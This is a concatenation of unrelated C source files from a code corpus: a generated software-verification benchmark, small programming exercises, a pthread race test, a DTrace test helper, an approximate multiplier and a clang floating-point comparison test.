if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==19))&&(a28==17))&&!(a7==1))&&(a14==18))){
error_40: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==19))&&(a28==15))&&!(a7==1))&&(a14==18))){
error_4: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==17))&&(a28==17))&&!(a7==1))&&(a14==18))){
error_38: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==18))&&(a28==17))&&!(a7==1))&&(a14==19))){
error_45: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==17))&&(a28==15))&&(a7==1))&&(a14==20))){
error_11: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==17))&&(a28==16))&&!(a7==1))&&(a14==19))){
error_26: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==17))&&(a28==15))&&(a7==1))&&(a14==18))){
globalError: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==18))&&(a28==15))&&!(a7==1))&&(a14==19))){
error_9: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==17))&&(a28==16))&&(a7==1))&&(a14==18))){
error_17: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==17))&&(a28==16))&&!(a7==1))&&(a14==20))){
error_32: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==17))&&(a28==17))&&(a7==1))&&(a14==18))){
error_35: exit(0);
}
if(((((((((a3==1)&&(a4==17))&&(a25==1))&&(a1==1))&&(a26==19))&&(a28==15))&&(a7==1))&&(a14==18))){
error_55: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==18))&&(a28==17))&&(a7==1))&&(a14==18))){
error_36: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==17))&&(a28==15))&&!(a7==1))&&(a14==20))){
error_14: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==18))&&(a28==16))&&(a7==1))&&(a14==18))){
error_18: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==19))&&(a28==15))&&(a7==1))&&(a14==20))){
error_13: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==18))&&(a28==15))&&!(a7==1))&&(a14==20))){
error_15: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==18))&&(a28==16))&&!(a7==1))&&(a14==19))){
error_27: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==18))&&(a28==16))&&(a7==1))&&(a14==20))){
error_30: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==17))&&(a28==17))&&!(a7==1))&&(a14==19))){
error_44: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==17))&&(a28==15))&&(a7==1))&&(a14==19))){
error_5: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==17))&&(a28==16))&&(a7==1))&&(a14==20))){
error_29: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==18))&&(a28==15))&&!(a7==1))&&(a14==18))){
error_3: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==17))&&(a28==17))&&(a7==1))&&(a14==20))){
error_47: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==18))&&(a28==17))&&!(a7==1))&&(a14==20))){
error_51: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==19))&&(a28==16))&&!(a7==1))&&(a14==20))){
error_34: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==19))&&(a28==15))&&(a7==1))&&(a14==19))){
error_7: exit(0);
}
if(((((((((a3==1)&&(a4==17))&&(a25==1))&&(a1==1))&&(a26==17))&&(a28==15))&&(a7==1))&&(a14==19))){
error_59: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==19))&&(a28==17))&&(a7==1))&&(a14==20))){
error_49: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==19))&&(a28==17))&&!(a7==1))&&(a14==19))){
error_46: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==17))&&(a28==16))&&!(a7==1))&&(a14==18))){
error_20: exit(0);
}
if(((((((((a3==1)&&(a4==17))&&(a25==1))&&(a1==1))&&(a26==18))&&(a28==15))&&!(a7==1))&&(a14==18))){
error_57: exit(0);
}
if(((((((((a3==1)&&(a4==17))&&(a25==1))&&(a1==1))&&(a26==17))&&(a28==15))&&(a7==1))&&(a14==18))){
error_53: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==18))&&(a28==16))&&!(a7==1))&&(a14==18))){
error_21: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==19))&&(a28==16))&&(a7==1))&&(a14==19))){
error_25: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==19))&&(a28==17))&&(a7==1))&&(a14==19))){
error_43: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==19))&&(a28==15))&&!(a7==1))&&(a14==20))){
error_16: __VERIFIER_error();
}
if(((((((((a3==1)&&(a4==17))&&(a25==1))&&(a1==1))&&(a26==17))&&(a28==15))&&!(a7==1))&&(a14==18))){
error_56: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==18))&&(a28==15))&&(a7==1))&&(a14==18))){
error_0: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==17))&&(a28==15))&&!(a7==1))&&(a14==18))){
error_2: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==18))&&(a28==16))&&(a7==1))&&(a14==19))){
error_24: exit(0);
}
if(((((((((a3==1)&&(a4==17))&&(a25==1))&&(a1==1))&&(a26==18))&&(a28==15))&&(a7==1))&&(a14==18))){
error_54: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==17))&&(a28==16))&&(a7==1))&&(a14==19))){
error_23: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==18))&&(a28==17))&&(a7==1))&&(a14==20))){
error_48: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==17))&&(a28==15))&&!(a7==1))&&(a14==19))){
error_8: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==19))&&(a28==16))&&!(a7==1))&&(a14==19))){
error_28: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==19))&&(a28==15))&&(a7==1))&&(a14==18))){
error_1: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==19))&&(a28==15))&&!(a7==1))&&(a14==19))){
error_10: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==17))&&(a28==17))&&(a7==1))&&(a14==19))){
error_41: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==18))&&(a28==16))&&!(a7==1))&&(a14==20))){
error_33: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==19))&&(a28==16))&&!(a7==1))&&(a14==18))){
error_22: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==18))&&(a28==17))&&(a7==1))&&(a14==19))){
error_42: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==19))&&(a28==17))&&(a7==1))&&(a14==18))){
error_37: exit(0);
}
if(((((((((a3==1)&&(a4==16))&&(a25==1))&&(a1==1))&&(a26==17))&&(a28==17))&&!(a7==1))&&(a14==20))){
error_50: exit(0);
}
return -2;
}
int main()
{
// default output
int output = -1;
// main i/o-loop
while(1)
{
// read input
int input;
input = __VERIFIER_nondet_int();
if ((input != 1) && (input != 2) && (input != 3) && (input != 4) && (input != 5) && (input != 6)) return -2;
// operate eca engine
output = calculate_output(input);
}
}
|
the_stack_data/138084.c | #include <unistd.h>
void ft_putchar(char c)
{
write(1, &c, 1);
}
void ft_putnbr(int nb)
{
if (nb > 9)
{
ft_putnbr(nb / 10);
ft_putnbr(nb % 10);
}
else
ft_putchar(nb + '0');
}
int main(int ac, char **av)
{
(void)av;
ac--;
ft_putnbr(ac);
ft_putchar('\n');
return (0);
}
|
the_stack_data/247019402.c | /*
Make a simple half rhombus using recursion
Sample Input :
7
-1
Sample Output :
*
* *
* * *
* * * *
* * * * *
* * * * * *
* * * * * * *
* * * * * *
* * * * *
* * * *
* * *
* *
*
*/
#include <stdio.h>
void topTriangle(int x){
for(int i=1;i<=x;i++)
printf("* ");
printf("\n");
}
void bottomTriangle(int x){
for(int i=1;i<=x;i++)
printf("* ");
printf("\n");
}
int plus(int p, int x){
if(p==x)
return 0;
topTriangle(p);
plus(p+1, x);
}
int minus(int x){
if(x==0)
return 0;
bottomTriangle(x);
minus(x-1);
}
int main(){
int n, o = 1;
for(int i=0;i<=0;i--){
scanf("%d", &n);
if(n==-1) //-1 for exit program
return 0;
plus(o, n);
minus(n);
}
}
|
the_stack_data/18887838.c | #include <stdio.h>
#include <time.h>
#include <stdlib.h>
void shuffle(int *array, int tamanho) { //sorteia grantidamente único - algoritmo Fisher-Yates
for (int i = tamanho - 1; i > 0; i--) {
int j = rand() % (i + 1);
int tmp = array[j];
array[j] = array[i];
array[i] = tmp;
}
}
int main() {
srand(time(NULL));
int roll[8] = { 0, 1, 2, 3, 4, 5, 6, 7 }; //cria os valore permitidos
shuffle(roll, 8); //embaralha
int resultado[6];
for (int i = 0; i < 3; i++) { //só escolhe 3 números conforme a definição
resultado[i] = roll[i];
resultado[i + 3] = roll[i]; //repete o número
}
shuffle(resultado, 6); //embaralha os números que estavam agrupados
for (int i = 0; i < 6; i++) printf("%d ", resultado[i]);
}
//https://pt.stackoverflow.com/q/315483/101
|
the_stack_data/558166.c |
#include <stdio.h>
#include <string.h>
void barInDylib()
{
}
|
the_stack_data/95450304.c | //#include <assert.h>
#include <pthread.h>
int x=0;
void* t1(void* arg)
{
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
// 10
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
// 20
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
// 30
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
// 40
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
// 50
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
// 60
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
// 70
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
// 80
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
// 90
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
// 100
assert(0<x);
}
void* t2(void* arg)
{
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
// 10
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
// 20
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
// 30
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
// 40
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
// 50
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
// 60
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
// 70
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
// 80
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
// 90
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
// 100
assert(0<x);
}
void* t3(void* arg)
{
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
// 10
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
// 20
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
// 30
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
// 40
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
// 50
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
// 60
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
// 70
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
// 80
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
// 90
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
x++;
// 100
assert(0<x);
}
int main(void)
{
pthread_t id[3];
pthread_create(id[0], NULL, &t1, NULL);
pthread_create(id[1], NULL, &t2, NULL);
pthread_create(id[2], NULL, &t3, NULL);
return 0;
}
|
the_stack_data/89199624.c | /* ************************************************************************** */
/* */
/* ::: :::::::: */
/* ft_memset.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: ypikul <[email protected]> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2017/10/25 01:27:28 by ypikul #+# #+# */
/* Updated: 2017/10/25 01:27:56 by ypikul ### ########.fr */
/* */
/* ************************************************************************** */
#include <string.h>
void *ft_memset(void *b, int c, size_t len)
{
unsigned char *dst;
dst = b;
while (len--)
*dst++ = (unsigned char)c;
return (b);
}
|
the_stack_data/86076206.c | // Copyright 2015 Heidelberg University Copyright and related rights are
// licensed under the Solderpad Hardware License, Version 0.51 (the "License");
// you may not use this file except in compliance with the License. You may obtain
// a copy of the License at http://solderpad.org/licenses/SHL-0.51. Unless
// required by applicable law or agreed to in writing, software, hardware and
// materials distributed under this License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See
// the License for the specific language governing permissions and limitations
// under the License.
typedef unsigned char uint8_t;
typedef unsigned int uint32_t;
#define SIZE (3000)
uint32_t v[SIZE];
uint32_t u[SIZE];
static void init()
{
int i;
for(i=0; i<SIZE; i++) {
v[i] = 0;
u[i] = 0;
}
}
static void fill()
{
int i;
v[0] = 0;
for(i=1; i<SIZE; i++)
v[i] = v[i-1] + 1;
}
static void forever()
{
while(1) {
asm volatile ("nop");
}
}
static void forever_burn()
{
int i;
while( 1 ) {
for(i=1; i<SIZE; i++) {
/*u[i] = ((u[i-1] * u[i]) / v[i]) + v[i]; */
u[i] = (u[i-1] * u[i]) + v[i];
}
}
}
void start()
{
init();
fill();
/*forever_burn();*/
}
|
the_stack_data/45450558.c | #include <stdio.h>
#include <math.h>
#include <stdbool.h>
int snippet(int x, int y) {
int result = 0;
int path = 0;
if (x > 0) {
if (y == x * x) {
path = 1;
}
else {
path = 2;
}
if (y > 8) {
if (path == 1)
result = 3;
if (path == 2)
result = 13;
}
else {
if (path == 1)
result = 4;
if (path == 2)
result = 14;
}
}
return result;
} |
the_stack_data/24086.c | /*
* CDDL HEADER START
*
* The contents of this file are subject to the terms of the
* Common Development and Distribution License (the "License").
* You may not use this file except in compliance with the License.
*
* You can obtain a copy of the license at usr/src/OPENSOLARIS.LICENSE
* or http://www.opensolaris.org/os/licensing.
* See the License for the specific language governing permissions
* and limitations under the License.
*
* When distributing Covered Code, include this CDDL HEADER in each
* file and include the License file at usr/src/OPENSOLARIS.LICENSE.
* If applicable, add the following below this CDDL HEADER, with the
* fields enclosed by brackets "[]" replaced with your own identifying
* information: Portions Copyright [yyyy] [name of copyright owner]
*
* CDDL HEADER END
*/
/*
* Copyright 2006 Sun Microsystems, Inc. All rights reserved.
* Use is subject to license terms.
*/
#pragma ident "%Z%%M% %I% %E% SMI"
#include <sys/ioctl.h>
#include <assert.h>
#include <setjmp.h>
#include <signal.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <fcntl.h>
static sigjmp_buf env;
static void
interrupt(int sig)
{
siglongjmp(env, sig);
}
int
main(int argc, char *argv[])
{
const char *file = "/dev/null";
int i, n, fds[10];
struct sigaction act;
if (argc > 1) {
(void) fprintf(stderr, "Usage: %s\n", argv[0]);
return (EXIT_FAILURE);
}
act.sa_handler = interrupt;
act.sa_flags = 0;
(void) sigemptyset(&act.sa_mask);
(void) sigaction(SIGUSR1, &act, NULL);
closefrom(0);
n = 0;
/*
* With all of our file descriptors closed, wait here spinning in bogus
* ioctl() calls until DTrace hits us with a SIGUSR1 to start the test.
*/
if (sigsetjmp(env, 1) == 0) {
for (;;)
(void) ioctl(-1, 0, NULL);
}
/*
* To test the fds[] array, we open /dev/null (a file with reliable
* pathname and properties) using various flags and seek offsets.
*/
fds[n++] = open(file, O_RDONLY);
fds[n++] = open(file, O_WRONLY);
fds[n++] = open(file, O_RDWR);
fds[n++] = open(file, O_RDWR | O_APPEND | O_CREAT |
O_NOCTTY | O_NONBLOCK | O_NDELAY | O_SYNC | O_TRUNC | 0666);
fds[n++] = open(file, O_RDWR);
(void) lseek(fds[n - 1], 123, SEEK_SET);
/*
* Once we have all the file descriptors in the state we want to test,
* issue a bogus ioctl() on each fd with cmd 0 and arg NULL to whack
* our DTrace script into recording the content of the fds[] array.
*/
for (i = 0; i < n; i++)
(void) ioctl(fds[i], 0, NULL);
assert(n <= sizeof (fds) / sizeof (fds[0]));
exit(0);
}
|
the_stack_data/67324891.c | #include <stdio.h>
#include <math.h>
#include <stdlib.h>
typedef unsigned char uint8_t;
typedef unsigned short uint16_t;
typedef unsigned long uint32_t;
typedef unsigned long long uint64_t;
#define MAX_NUM (1 << 16)
#define MAX_NUM1 (1 << 15)
uint16_t leadingBitPosition(uint16_t val)
{
uint16_t clz;
// clz function calculates number of leading zeros in integer number
clz = __builtin_clz(val);
return 31-clz;
}
int ALM_SOA( int a, int b, unsigned short w) {
if(a == 0 | b == 0) return 0;
unsigned short n;
n = 16;
char sgn_a = a > 0 ? 0 : 1;
char sgn_b = b > 0 ? 0 : 1;
unsigned int a_abs = sgn_a ? -(a)-1 : a;
unsigned int b_abs = sgn_b ? -(b)-1 : b;
unsigned int k_a, x_a;
k_a = leadingBitPosition(a_abs);
x_a = a_abs << (n - 1 - k_a);
unsigned int k_b, x_b;
k_b = leadingBitPosition(b_abs);
x_b = b_abs << (n - 1 - k_b);
unsigned int tmp, tmp_prim, tmp_sec;
tmp = (1<<(n-1))-1;
tmp_prim = (1<<w)-1;
tmp_sec = (1<<w-1);
unsigned int y_a, y_b;
y_a = x_a & tmp;
y_b = x_b & tmp;
// Truncation
unsigned int y_l,y_a_trunc, y_b_trunc;
y_a_trunc = (tmp - tmp_prim) & y_a;
y_b_trunc = (tmp - tmp_prim) & y_b;
unsigned int carry_in = ((y_a & y_b) & (tmp_sec))*2;
y_l = (y_a_trunc + y_b_trunc + carry_in)|tmp_prim;
unsigned int k_l;
k_l = k_a + k_b + (((y_l) & (tmp+1)) >> (n - 1));
y_l = y_l & tmp;
double m;
unsigned int p_abs;
m = (double)y_l / (1 << 15);
p_abs = (unsigned int)((1 + m)*(1 << k_l));
int p;
p = (sgn_a ^ sgn_b)? -p_abs-1 : p_abs;
return p;
}
int main() {
int x[] = {-7890,-789,6911,-26438,26438,-27820,-1685};
int y[] = {-4251,-4,5884,0,26174,16233,-1262};
int i,p,w;
w = 3;
FILE *log;
log = fopen("mult_log.txt", "w");
for (i=0;i<7;i++){
p = ALM_SOA(x[i],y[i],w);
printf("x =%d, y=%d, p=%d, exact=%d \n",x[i],y[i],p,x[i]*y[i]);
}
fclose(log);
} |
the_stack_data/181394402.c | // RUN: %clang_cc1 -ffp-exception-behavior=ignore -emit-llvm -o - %s | FileCheck %s -check-prefix=CHECK -check-prefix=FCMP
// RUN: %clang_cc1 -ffp-exception-behavior=strict -emit-llvm -o - %s | FileCheck %s -check-prefix=CHECK -check-prefix=EXCEPT
// RUN: %clang_cc1 -ffp-exception-behavior=maytrap -emit-llvm -o - %s | FileCheck %s -check-prefix=CHECK -check-prefix=MAYTRAP
// RUN: %clang_cc1 -frounding-math -ffp-exception-behavior=ignore -emit-llvm -o - %s | FileCheck %s -check-prefix=CHECK -check-prefix=IGNORE
// RUN: %clang_cc1 -frounding-math -ffp-exception-behavior=strict -emit-llvm -o - %s | FileCheck %s -check-prefix=CHECK -check-prefix=EXCEPT
// RUN: %clang_cc1 -frounding-math -ffp-exception-behavior=maytrap -emit-llvm -o - %s | FileCheck %s -check-prefix=CHECK -check-prefix=MAYTRAP
_Bool QuietEqual(float f1, float f2) {
// CHECK-LABEL: define {{.*}}i1 @QuietEqual(float %f1, float %f2)
// FCMP: fcmp oeq float %{{.*}}, %{{.*}}
// IGNORE: call i1 @llvm.experimental.constrained.fcmp.f32(float %{{.*}}, float %{{.*}}, metadata !"oeq", metadata !"fpexcept.ignore")
// EXCEPT: call i1 @llvm.experimental.constrained.fcmp.f32(float %{{.*}}, float %{{.*}}, metadata !"oeq", metadata !"fpexcept.strict")
// MAYTRAP: call i1 @llvm.experimental.constrained.fcmp.f32(float %{{.*}}, float %{{.*}}, metadata !"oeq", metadata !"fpexcept.maytrap")
return f1 == f2;
// CHECK: ret
}
_Bool QuietNotEqual(float f1, float f2) {
// CHECK-LABEL: define {{.*}}i1 @QuietNotEqual(float %f1, float %f2)
// FCMP: fcmp une float %{{.*}}, %{{.*}}
// IGNORE: call i1 @llvm.experimental.constrained.fcmp.f32(float %{{.*}}, float %{{.*}}, metadata !"une", metadata !"fpexcept.ignore")
// EXCEPT: call i1 @llvm.experimental.constrained.fcmp.f32(float %{{.*}}, float %{{.*}}, metadata !"une", metadata !"fpexcept.strict")
// MAYTRAP: call i1 @llvm.experimental.constrained.fcmp.f32(float %{{.*}}, float %{{.*}}, metadata !"une", metadata !"fpexcept.maytrap")
return f1 != f2;
// CHECK: ret
}
_Bool SignalingLess(float f1, float f2) {
// CHECK-LABEL: define {{.*}}i1 @SignalingLess(float %f1, float %f2)
// FCMP: fcmp olt float %{{.*}}, %{{.*}}
// IGNORE: call i1 @llvm.experimental.constrained.fcmps.f32(float %{{.*}}, float %{{.*}}, metadata !"olt", metadata !"fpexcept.ignore")
// EXCEPT: call i1 @llvm.experimental.constrained.fcmps.f32(float %{{.*}}, float %{{.*}}, metadata !"olt", metadata !"fpexcept.strict")
// MAYTRAP: call i1 @llvm.experimental.constrained.fcmps.f32(float %{{.*}}, float %{{.*}}, metadata !"olt", metadata !"fpexcept.maytrap")
return f1 < f2;
// CHECK: ret
}
_Bool SignalingLessEqual(float f1, float f2) {
// CHECK-LABEL: define {{.*}}i1 @SignalingLessEqual(float %f1, float %f2)
// FCMP: fcmp ole float %{{.*}}, %{{.*}}
// IGNORE: call i1 @llvm.experimental.constrained.fcmps.f32(float %{{.*}}, float %{{.*}}, metadata !"ole", metadata !"fpexcept.ignore")
// EXCEPT: call i1 @llvm.experimental.constrained.fcmps.f32(float %{{.*}}, float %{{.*}}, metadata !"ole", metadata !"fpexcept.strict")
// MAYTRAP: call i1 @llvm.experimental.constrained.fcmps.f32(float %{{.*}}, float %{{.*}}, metadata !"ole", metadata !"fpexcept.maytrap")
return f1 <= f2;
// CHECK: ret
}
_Bool SignalingGreater(float f1, float f2) {
// CHECK-LABEL: define {{.*}}i1 @SignalingGreater(float %f1, float %f2)
// FCMP: fcmp ogt float %{{.*}}, %{{.*}}
// IGNORE: call i1 @llvm.experimental.constrained.fcmps.f32(float %{{.*}}, float %{{.*}}, metadata !"ogt", metadata !"fpexcept.ignore")
// EXCEPT: call i1 @llvm.experimental.constrained.fcmps.f32(float %{{.*}}, float %{{.*}}, metadata !"ogt", metadata !"fpexcept.strict")
// MAYTRAP: call i1 @llvm.experimental.constrained.fcmps.f32(float %{{.*}}, float %{{.*}}, metadata !"ogt", metadata !"fpexcept.maytrap")
return f1 > f2;
// CHECK: ret
}
_Bool SignalingGreaterEqual(float f1, float f2) {
// CHECK-LABEL: define {{.*}}i1 @SignalingGreaterEqual(float %f1, float %f2)
// FCMP: fcmp oge float %{{.*}}, %{{.*}}
// IGNORE: call i1 @llvm.experimental.constrained.fcmps.f32(float %{{.*}}, float %{{.*}}, metadata !"oge", metadata !"fpexcept.ignore")
// EXCEPT: call i1 @llvm.experimental.constrained.fcmps.f32(float %{{.*}}, float %{{.*}}, metadata !"oge", metadata !"fpexcept.strict")
// MAYTRAP: call i1 @llvm.experimental.constrained.fcmps.f32(float %{{.*}}, float %{{.*}}, metadata !"oge", metadata !"fpexcept.maytrap")
return f1 >= f2;
// CHECK: ret
}
_Bool QuietLess(float f1, float f2) {
// CHECK-LABEL: define {{.*}}i1 @QuietLess(float %f1, float %f2)
// FCMP: fcmp olt float %{{.*}}, %{{.*}}
// IGNORE: call i1 @llvm.experimental.constrained.fcmp.f32(float %{{.*}}, float %{{.*}}, metadata !"olt", metadata !"fpexcept.ignore")
// EXCEPT: call i1 @llvm.experimental.constrained.fcmp.f32(float %{{.*}}, float %{{.*}}, metadata !"olt", metadata !"fpexcept.strict")
// MAYTRAP: call i1 @llvm.experimental.constrained.fcmp.f32(float %{{.*}}, float %{{.*}}, metadata !"olt", metadata !"fpexcept.maytrap")
return __builtin_isless(f1, f2);
// CHECK: ret
}
_Bool QuietLessEqual(float f1, float f2) {
// CHECK-LABEL: define {{.*}}i1 @QuietLessEqual(float %f1, float %f2)
// FCMP: fcmp ole float %{{.*}}, %{{.*}}
// IGNORE: call i1 @llvm.experimental.constrained.fcmp.f32(float %{{.*}}, float %{{.*}}, metadata !"ole", metadata !"fpexcept.ignore")
// EXCEPT: call i1 @llvm.experimental.constrained.fcmp.f32(float %{{.*}}, float %{{.*}}, metadata !"ole", metadata !"fpexcept.strict")
// MAYTRAP: call i1 @llvm.experimental.constrained.fcmp.f32(float %{{.*}}, float %{{.*}}, metadata !"ole", metadata !"fpexcept.maytrap")
return __builtin_islessequal(f1, f2);
// CHECK: ret
}
_Bool QuietGreater(float f1, float f2) {
// CHECK-LABEL: define {{.*}}i1 @QuietGreater(float %f1, float %f2)
// FCMP: fcmp ogt float %{{.*}}, %{{.*}}
// IGNORE: call i1 @llvm.experimental.constrained.fcmp.f32(float %{{.*}}, float %{{.*}}, metadata !"ogt", metadata !"fpexcept.ignore")
// EXCEPT: call i1 @llvm.experimental.constrained.fcmp.f32(float %{{.*}}, float %{{.*}}, metadata !"ogt", metadata !"fpexcept.strict")
// MAYTRAP: call i1 @llvm.experimental.constrained.fcmp.f32(float %{{.*}}, float %{{.*}}, metadata !"ogt", metadata !"fpexcept.maytrap")
return __builtin_isgreater(f1, f2);
// CHECK: ret
}
_Bool QuietGreaterEqual(float f1, float f2) {
// CHECK-LABEL: define {{.*}}i1 @QuietGreaterEqual(float %f1, float %f2)
// FCMP: fcmp oge float %{{.*}}, %{{.*}}
// IGNORE: call i1 @llvm.experimental.constrained.fcmp.f32(float %{{.*}}, float %{{.*}}, metadata !"oge", metadata !"fpexcept.ignore")
// EXCEPT: call i1 @llvm.experimental.constrained.fcmp.f32(float %{{.*}}, float %{{.*}}, metadata !"oge", metadata !"fpexcept.strict")
// MAYTRAP: call i1 @llvm.experimental.constrained.fcmp.f32(float %{{.*}}, float %{{.*}}, metadata !"oge", metadata !"fpexcept.maytrap")
return __builtin_isgreaterequal(f1, f2);
// CHECK: ret
}
_Bool QuietLessGreater(float f1, float f2) {
// CHECK-LABEL: define {{.*}}i1 @QuietLessGreater(float %f1, float %f2)
// FCMP: fcmp one float %{{.*}}, %{{.*}}
// IGNORE: call i1 @llvm.experimental.constrained.fcmp.f32(float %{{.*}}, float %{{.*}}, metadata !"one", metadata !"fpexcept.ignore")
// EXCEPT: call i1 @llvm.experimental.constrained.fcmp.f32(float %{{.*}}, float %{{.*}}, metadata !"one", metadata !"fpexcept.strict")
// MAYTRAP: call i1 @llvm.experimental.constrained.fcmp.f32(float %{{.*}}, float %{{.*}}, metadata !"one", metadata !"fpexcept.maytrap")
return __builtin_islessgreater(f1, f2);
// CHECK: ret
}
_Bool QuietUnordered(float f1, float f2) {
// CHECK-LABEL: define {{.*}}i1 @QuietUnordered(float %f1, float %f2)
// FCMP: fcmp uno float %{{.*}}, %{{.*}}
// IGNORE: call i1 @llvm.experimental.constrained.fcmp.f32(float %{{.*}}, float %{{.*}}, metadata !"uno", metadata !"fpexcept.ignore")
// EXCEPT: call i1 @llvm.experimental.constrained.fcmp.f32(float %{{.*}}, float %{{.*}}, metadata !"uno", metadata !"fpexcept.strict")
// MAYTRAP: call i1 @llvm.experimental.constrained.fcmp.f32(float %{{.*}}, float %{{.*}}, metadata !"uno", metadata !"fpexcept.maytrap")
